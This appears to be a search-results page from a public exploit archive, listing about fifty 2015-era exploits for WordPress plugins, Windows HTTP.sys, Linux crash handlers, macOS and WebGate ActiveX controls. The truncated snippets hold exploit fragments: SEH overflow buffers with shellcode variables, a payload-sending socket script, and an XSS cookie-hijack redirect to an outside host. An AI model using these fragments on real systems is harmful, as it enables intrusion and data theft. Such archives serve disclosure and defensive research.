41207 matches found
Oracle - Outside-In .DOCX File Parsing Memory Corruption
Oracle - Outside-In .DOCX File Parsing Memory Corruption Title: Oracle Outside-In DOCX File Parsing Memory Corruption Platforms: Windows CVE: Secunia: PRL: 2015-04 Author: Francis Provencher Protek Research Lab’s Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch 1 Introduction 2...
Microsoft Windows - HTTP.sys HTTP Request Parsing Denial of Service (MS15-034)
Microsoft Windows - HTTP.sys HTTP Request Parsing Denial of Service MS15-034 Tested on Win Srv 2012R2. import socket,sys if lensys.argv=1: sys.exit'Give me an IP' Host = sys.argv1 def SendPayloadPayload, Host: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectHost, 80 s.sendPayload...
WordPress Plugin Ajax Store Locator 1.2 - SQL Injection
WordPress Plugin Ajax Store Locator 1.2 - SQL Injection Exploit Title : Wordpress Ajax Store Locator = 5.0.12 AND time-based blind SELECT' injectable for the remaining tests, do you want to include all tests for 'MySQ...
Microsoft Windows - HTTP.sys (PoC) (MS15-034)
Microsoft Windows - HTTP.sys PoC MS15-034 / UNTESTED - MS15-034 Checker THE BUG: 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd 8a868ae1 ; he...
WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (1)
WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download 1 Exploit Title :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit Vendor :Miwisoft LLC Vendor Homepage :http://www.miwisoft.com Version :1.0.5 Tested on :Win7/Chrome/Firefox Exploit Author :Necmettin COSKUN...
Abrt (Fedora 21) - Race Condition
Abrt Fedora 21 - Race Condition include include include include include include include include include include include include include include include // // This is a race condition exploit for CVE-2015-1862, targeting Fedora. // // Note: It can take a few minutes to win the race condition. // /...
WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion
WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and lightweight file...
WordPress Plugin Video Gallery 2.8 - SQL Injection
WordPress Plugin Video Gallery 2.8 - SQL Injection Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerability Exploit Author : Claudio Viviani Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery Software Link :...
Apport/Abrt (Ubuntu Fedora) - Local Privilege Escalation
Apport/Abrt Ubuntu Fedora - Local Privilege Escalation define GNUSOURCE include include include include include include include include include include include include include include warning this file must be compiled with -static // // Apport/Abrt Vulnerability Demo Exploit. // // Apport:...
WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities
WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and...
WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation Remote Code Execution
WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation Remote Code Execution WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit RCE Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart,...
Samsung iPOLiS - ReadConfigValue Remote Code Execution
Samsung iPOLiS - ReadConfigValue Remote Code Execution var shellcode =...
Mac-OSX-Privilege-Escalation
Apple Mac OS X contains a flaw in the Admin Framework that is triggered when checking XPC entitlements. This may allow a process to gain administrative privileges without properly authenticating...
Linux Kernel 3.133.14 (Ubuntu) - splice() System Call Local Denial of Service
Linux Kernel 3.133.14 Ubuntu - splice System Call Local Denial of Service / cve-2014-7822poc.c The implementation of certain splicewrite file operations in the Linux kernel before 3.16 does not...
ProFTPd 1.3.5 - File Copy
ProFTPd 1.3.5 - File Copy Description TJ Saunders 2015-04-07 16:35:03 UTC Vadim Melihow reported a critical issue with proftpd installations that use the modcopy module's SITE CPFR/SITE CPTO commands; modcopy allows these commands to be used by unauthenticated clients:...
Traidnt Up 3.0 - SQL Injection
Traidnt Up 3.0 - SQL Injection Exploit Title: Traidnt Up v3.0 SQL Injection Google Dork: "Powered by TRAIDNT UP Version 3.0" Date: 10-04-2015 Exploit Author: Ali Sami [email protected] Vendor Homepage: http://traidnt.net Software Link:...
Apple Mac OSX 10.910 - Local Privilege Escalation
Apple Mac OSX 10.910 - Local Privilege Escalation / osx-irony-assist.m Copyright c 2010 by Apple MACOS X include import import / where you want to write it! / define BACKDOORBIN "/var/db/.AccessibilityAPIEnabled" int doassistivecopyconst char spath, const char dpath NSAutoreleasePool pool =...
WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure
WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure Exploit Title: Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability Date: April 11, 2015 Exploit Author: @LookHin Khwanchai Kaewyos Google Dork: inurl:?fdxswitcher=mobile Vendor Homepage:...
WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (1)
WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload 1 Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability Exploit Author : Claudio Viviani Software Link :...
Samba 3.6.2 (x86) - Denial of Service (PoC)
Samba 3.6.2 x86 - Denial of Service PoC !/usr/bin/python """ Exploit for Samba vulnerability CVE-2015-0240 by sleepya The exploit only targets vulnerable x86 smbd 3.6.24 which 'creds' is controlled by ReferentID field of PrimaryName ServerName. That means 'talloczero' in libtalloc does not write a...
WordPress Plugin Duplicator 0.5.14 - SQL Injection Cross-Site Request Forgery
WordPress Plugin Duplicator 0.5.14 - SQL Injection Cross-Site Request Forgery Exploit Title : Wordpress Duplicator prefix . 'duplicatorpackages'; $postIDs = isset$post'duplicatordelid' ? $post'duplicatordelid' : null; $list = explode",", $postIDs; $delCount = 0; if $postIDs != null foreach $list...
WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload
WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerability Author : Manish Kishan Tanwar AKA error1046 Home Page :...
Barracuda Firmware 5.0.0.012 - (Authenticated) Remote Command Execution (Metasploit)
Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution Metasploit Exploit Title: Barracuda Firmware 'Barracuda Firmware %q This module exploits a remote command execution vulnerability in the Barracuda Firmware Version 'xort', metasploit module , 'Version' = '$Revision: 12345 $',...
Apple Mac OSX 10.7.5/10.8.2/10.9.5/10.10.2 - Rootpipe Local Privilege Escalation
Apple Mac OSX 10.7.5/10.8.2/10.9.5/10.10.2 - Rootpipe Local Privilege Escalation PoC exploit code for rootpipe CVE-2015-1130 Created by Emil Kvarnhammar, TrueSec Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2 import os import sys import platform import re import ctypes import objc import sys from...
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting Exploit Title: Shareaholic 7.6.0.3 XSS Date: 10-11-2014 Software Link: https://wordpress.org/plugins/shareaholic/ Exploit Author: Kacper Szurek Contact: http://twitter.com/KacperSzurek Website: http://security.szurek.pl/ CVE: CVE-2014-93...
Balero CMS 0.7.2 - Multiple Blind SQL Injections
Balero CMS 0.7.2 - Multiple Blind SQL Injections Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities Vendor: BaleroCMS Software Product web page: http://www.balerocms.com Affected version: 0.7.2 Summary: Balero CMS is an open source project that can help you manage the page of your...
WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection
WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection Google Dork: inurl:/plugins/trafficanalyzer/js/ Date: 4/7/2015 Exploit Author: Dan King @fuzztester Vendor Homepage: http://wptrafficanalyzer.in/ Software Link:...
Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities
Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pent...
WordPress Plugin All In One WP Security Firewall 3.9.0 - SQL Injection
WordPress Plugin All In One WP Security Firewall 3.9.0 - SQL Injection Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability Exploit Author : Claudio Viviani Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ Software Link ...
Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution
Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution Remote code execution in Novell ZENworks Configuration Management 11.3.1 Discovered by Pedro Ribeiro [email protected], Agile Information Security...
w3tw0rk-Pitbull-Perl-IRC
Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution Author: Jay Turla @shipcod3 Description: pitbull-w3tw0rkhunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution...
w3tw0rk Pitbull Perl IRC Bot - Remote Code Execution
w3tw0rk Pitbull Perl IRC Bot - Remote Code Execution thehunter.py Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution Author: Jay Turla @shipcod3 Description: pitbull-w3tw0rkhunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows...
u-Auctions - Multiple Vulnerabilities
u-Auctions - Multiple Vulnerabilities Exploit Title: u-Auctions Multiple Vulnerabilities Google Dork: "Powered by u-Auctions ©" Date: 03 April 2015 Exploit Author: Don Vendor Homepage: https://www.u-auctions.com / Version: ALL Tested on: Debian 1. Blind SQL injection: This vulnerability affects...
WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload
WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability Exploit Author : Claudio Viviani Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip Date : 2015-03-...
Airties-Air5650TT-Remote
Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: [email protected] Twitter: @batuhanburakcin...
IDM-6.20-Local-Buffer
Author: TUNISIAN CYBER + Exploit Title: IDM v6.20 Local Buffer Overflow + Date: 27-03-2015 + Type: Local Exploits + Tested on: WinXp/Windows 7 Pro + Vendor: https://www.internetdownloadmanager.com/ + Friendly Sites: sec4ever.com...
WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload
WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17 Author: Larry W. Cashdollar, @larry0 Date: 2015-03-29 Download Site:...
phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection
phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection 0-day Website : http://codecanyon.net/item/phpsfp-schedule-facebook-posts/5177393...
WordPress Plugin Business Intelligence - SQL Injection (Metasploit)
WordPress Plugin Business Intelligence - SQL Injection Metasploit Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability Author : Jagriti Sahu AKA Incredible Vendor Link : https://www.wpbusinessintelligence.com Download Link :...
Multiple WordPress UpThemes Themes - Arbitrary File Upload
Multiple WordPress UpThemes Themes - Arbitrary File Upload Exploit Title: Wordpress SimpleCart Theme File Upload and Execution Google Dork: inurl:/wp-content/themes/simplecart Date: 31 March 2015 Exploit Author: Divya Vendor Homepage: https://github.com/UpThemes/ Software Link:...
WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow
WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...
WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow
WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow var arg1="PraveenD"; var arg2=1; var arg3= ""; var arg4="PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i1664; i++ arg3 += "B"; var nseh = "\xeb\x10PD"; //WESPSerialPort.dll0x100104e7 = pop pop ret var seh =...
WebGate WESP SDK 1.2 - ChangePassword Stack Overflow
WebGate WESP SDK 1.2 - ChangePassword Stack Overflow var arg1 = ""; var arg2 = "PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i248; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; //WESPConfig.dll0x10022f35 = pop pop pop ret var seh = "\x3d\x2f\x02\x10"; for i=0;i80; i++ nops +...
Kemp Load Master 7.1.16 - Multiple Vulnerabilities
Kemp Load Master 7.1.16 - Multiple Vulnerabilities Exploit Title: Kemp Load Master - Multiple Vulnerabilities RCE, CSRF, XSS, DoS Date: 01 April 2015 Author: Roberto Suggi Liverani Software Link: http://kemptechnologies.com/load-balancer/ Version: 7.1.16 and previous versions Tested on: Kemp Load...
WordPress Plugin Simple Ads Manager - Multiple SQL Injections
WordPress Plugin Simple Ads Manager - Multiple SQL Injections Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection Product: Wordpress plugin Simple Ads Manager Vendor: https://profiles.wordpress.org/minimus/ Affected version: Simple Ads Manager 2.5.94 and 2.5.96 Download link:...
WordPress Plugin Video Gallery 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities
WordPress Plugin Video Gallery 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities Exploit Title: Wordpress Video Gallery Plugin Multiple CSRF File Upload Google Dork: inurl:/wp-content/plugins/contus-video-gallery Date: 31 March 2015 Exploit Author: Divya Vendor Homepage:...
WordPress Plugin WP Easy Slideshow 1.0.3 - Multiple Vulnerabilities
WordPress Plugin WP Easy Slideshow 1.0.3 - Multiple Vulnerabilities Exploit Title: Wordpress WP Easy Slideshow Plugin Multiple Vulnerabilities Google Dork: inurl:/wp-content/uploads/wp-easy-slideshow/ Date: 2 April 2015 Exploit Author: Divya Vendor Homepage:...
Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal
Ericsson Drutt MSDP Instance Monitor - Directory Traversal Ericsson Drutt MSDP Instance Monitor - Directory Traversal Vulnerability and Arbitrary File Access...
WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow
WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...
WordPress Plugin Simple Ads Manager - Information Disclosure
WordPress Plugin Simple Ads Manager - Information Disclosure Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure Product: Wordpress plugin Simple Ads Manager Vendor: https://profiles.wordpress.org/minimus/ Affected version: Simple Ads Manager 2.5.94 and 2.5.96 Downlo...